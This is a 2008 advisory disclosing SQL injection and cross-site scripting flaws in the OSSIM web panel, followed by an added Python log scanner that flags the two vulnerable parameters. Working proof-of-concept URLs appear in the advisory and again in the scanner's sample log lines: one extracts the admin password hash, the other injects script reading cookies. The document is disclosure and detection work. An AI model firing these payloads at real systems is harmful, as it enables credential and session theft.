
| Subject: | SQL-injection, XSS in OSSIM (Open Source Security Information Management) |
|---|---|
| Date: | 21 Feb 2008 12:47:12 -0000 |

Application: OSSIM
http://www.ossim.net
Version: 0.9.9rc5
Note: it is possible that the problem also affects earlier OSSIM versions
Platforms: Linux
Bug: SQL injection, Cross Site Scripting
Exploitation: remote
Date: 21 Feb 2008
Author: Marcin Kopec
E-mail: marcin(dot)kopec(at)hotmail(dot)com

---------------------------------------

1) Introduction

OSSIM is a free implementation of a Security Information Management (SIM) system, equipped with many useful security tools (nessus, snort, p0f, ntop, ...) managed from an easy-to-use web panel.

2) SQL injection

The bug exists in the portname parameter of modifyportform.php.
It's possible to obtain the hashed administrator password when the user has rights to do port modification in the "PORTS" tab.

http://[host]/ossim/port/modifyportform.php?portname=ANY'%20and%201=2%20union%20select%20pass,2%20from%20ossim.users%20where%20login='admin

3) XSS

Quotes in OSSIM aren't properly sanitized. The XSS below may be executed without logging into OSSIM.

http://[host]/ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!--
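
A detection check for the two parameters named in the advisory, added here as an example (it is not part of the original message or of OSSIM's code). It scans web-server access logs for `portname` values outside a plain identifier allow-list and for `dest` values containing HTML metacharacters. The combined-log-style line format, the allow-list pattern and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request target inside a combined-log-style line (format is an assumption).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Assumption: legitimate port names are short identifiers.
SAFE_PORTNAME = re.compile(r'[A-Za-z0-9_.-]{1,64}')
# Characters that can break out of an HTML attribute or tag.
HTML_META = re.compile(r'[<>"\']')

# (path suffix, parameter, rule name, predicate that is True when suspicious)
RULES = [
    ("/port/modifyportform.php", "portname", "sqli-portname",
     lambda v: SAFE_PORTNAME.fullmatch(v) is None),
    ("/session/login.php", "dest", "xss-dest",
     lambda v: HTML_META.search(v) is not None),
]

# Constructed sample log lines; lines 2 and 4 carry the advisory's two URLs.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Feb/2008:12:00:01 +0000] "GET /ossim/port/modifyportform.php?portname=HTTP HTTP/1.1" 200 512',
    '10.0.0.9 - - [21/Feb/2008:12:00:07 +0000] "GET /ossim/port/modifyportform.php?portname=ANY\'%20and%201=2%20union%20select%20pass,2%20from%20ossim.users%20where%20login=\'admin HTTP/1.1" 200 640',
    '10.0.0.5 - - [21/Feb/2008:12:01:15 +0000] "GET /ossim/session/login.php?dest=/ossim/index.php HTTP/1.1" 200 901',
    '10.0.0.9 - - [21/Feb/2008:12:02:30 +0000] "GET /ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!-- HTTP/1.1" 200 955',
]


def scan(lines):
    """Return (line_number, rule, decoded_value) for each suspicious request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        # parse_qs percent-decodes values, so encoded quotes and tags are seen.
        params = parse_qs(url.query, keep_blank_values=True)
        for suffix, name, rule, suspicious in RULES:
            if not url.path.endswith(suffix):
                continue
            for value in params.get(name, []):
                if suspicious(value):
                    hits.append((n, rule, value))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same allow-list and metacharacter checks apply server-side as input validation, alongside parameterized queries for `portname` and HTML output encoding for `dest`.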